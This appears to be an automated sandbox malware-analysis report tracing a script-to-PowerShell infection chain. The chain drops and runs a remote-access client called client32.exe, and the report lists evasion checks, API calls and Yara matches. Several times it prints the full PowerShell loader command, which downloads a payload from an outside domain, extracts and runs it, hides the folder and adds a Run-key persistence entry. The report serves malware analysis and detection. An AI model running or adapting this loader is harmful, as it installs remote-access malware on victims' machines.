Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos | 13_2_110CB750
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110B86C0 Sleep,ExitProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2285
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Window / User API: threadDelayed 8212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evaded block: after key decision (graph_13-62928)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evaded block: after key decision (graph_13-62945)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evaded block: after key decision (graph_13-63670)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evaded block: after key decision (graph_13-67525)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evaded block: after key decision (graph_13-67130)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evaded block: after key decision (graph_13-67895)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evaded block: after key decision (graph_13-67862)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Evasive API call chain: GetLocalTime,DecisionNodes (graph_13-67267)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_13-62911)
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | API coverage: 6.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe TID: 4064 | Thread sleep time: -72750s >= -30000s
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe TID: 676 | Thread sleep time: -32300s >= -30000s
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe TID: 4064 | Thread sleep time: -2053000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8322BBF GetSystemInfo
Source: client32.exe | Binary or memory string: VMware
Source: wscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW ;
Source: wscript.exe, 00000009.00000003.1372423633.000002B2D535A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMCiVM
Source: wscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh;
Source: wscript.exe, 00000000.00000003.1353432566.000002BB08E04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1700690750.000002B2D8160000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: client32.exe | Binary or memory string: VMWare
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | API call chain: ExitProcess graph end node | graph_13-63256
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | API call chain: ExitProcess graph end node | graph_13-62881
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,13_2_110B7F30
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,13_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,13_2_1117D104
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,13_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,13_2_11031780
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_11162BB7

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\System32\wscript.exe | Network Connect: 79.141.163.131 443
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,13_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11113190 GetKeyState,DeviceIoControl,keybd_event,13_2_11113190
                                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe"
                                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $hsfb='https://roadrunnersell.com/trade/d.php?5517';$mayubqexzzv=(new-object system.net.webclient).downloadstring($hsfb);$jchvybqiuc=[system.convert]::frombase64string($mayubqexzzv);$asd = get-random -minimum -5 -maximum 12; $kdrzcqqaxe=[system.environment]::getfolderpath('applicationdata')+'\hhiahyow'+$asd;if (!(test-path $kdrzcqqaxe -pathtype container)) { new-item -path $kdrzcqqaxe -itemtype directory };$p=join-path $kdrzcqqaxe 'cxcc.zip';[system.io.file]::writeallbytes($p,$jchvybqiuc);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$kdrzcqqaxe)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $kdrzcqqaxe 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $kdrzcqqaxe -force; $fd.attributes='hidden';$s=$kdrzcqqaxe+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='wzzcvtpaz';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
                                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $hsfb='https://roadrunnersell.com/trade/d.php?5517';$mayubqexzzv=(new-object system.net.webclient).downloadstring($hsfb);$jchvybqiuc=[system.convert]::frombase64string($mayubqexzzv);$asd = get-random -minimum -5 -maximum 12; $kdrzcqqaxe=[system.environment]::getfolderpath('applicationdata')+'\hhiahyow'+$asd;if (!(test-path $kdrzcqqaxe -pathtype container)) { new-item -path $kdrzcqqaxe -itemtype directory };$p=join-path $kdrzcqqaxe 'cxcc.zip';[system.io.file]::writeallbytes($p,$jchvybqiuc);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$kdrzcqqaxe)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $kdrzcqqaxe 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $kdrzcqqaxe -force; $fd.attributes='hidden';$s=$kdrzcqqaxe+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='wzzcvtpaz';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,13_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,13_2_1109ED30
                                Source: client32.exe | Binary or memory string: Shell_TrayWnd
                                Source: client32.exe | Binary or memory string: Progman
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,13_2_11174898
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,13_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: GetLocaleInfoA,13_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,13_2_11174796
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,13_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,13_2_11174A69
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Queries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Queries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Queries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,13_2_110F37A0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,13_2_11134830
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,13_2_11147160
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,13_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,13_2_11145C70
                                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,13_2_11070430
                                Source: Yara match | File source: 13.2.client32.exe.74360000.5.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 13.2.client32.exe.73de0000.4.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 13.0.client32.exe.9f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 13.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 10.2.powershell.exe.1c0e60a24c0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 10.2.powershell.exe.1c0e60ac710.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 10.2.powershell.exe.1c0e608bc20.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 13.2.client32.exe.6cb60000.2.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 13.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000D.00000000.1597848713.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000A.00000002.1694167598.000001C0E609F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000A.00000002.1694167598.000001C0E6081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000D.00000002.2636997048.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000A.00000002.1694167598.000001C0E61D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000D.00000002.2728193047.000000006CBA0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000A.00000002.1694167598.000001C0E60AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 0000000A.00000002.1694167598.000001C0E5E6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL, type: DROPPED
